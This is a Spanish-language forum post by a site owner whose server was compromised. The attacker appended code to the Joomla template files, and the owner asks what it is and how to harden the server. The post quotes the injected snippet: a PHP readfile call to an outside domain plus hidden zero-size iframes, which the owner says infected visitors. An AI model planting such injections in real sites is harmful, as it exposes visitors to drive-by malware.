Hace unas 2 o 3 semanas que me ocurrió lo siguiente:
Yo uso en mi web
joomla y en el foro
IPB.
Resulta que alguien o algo hace 3 semanas consiguió entrar como root en mi servidor y modificó solo los archivos de las plantillas de mi web, añadiendo al final de ellas el siguiente código:
Código HTML:
@readfile("http://yahoo-analytics.net/links.dat"); ?> width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no> width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no> width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>
Cada vez que alguien entraba en la web este código intentaba infectar su pc. Curiosamente el foro no fue modificado, solo los archivos de las plantillas de joomla.
¿Alguien sabe algo sobre este código?
¿Qué medidas de seguridad puedo instalar en mi servidor dedicado?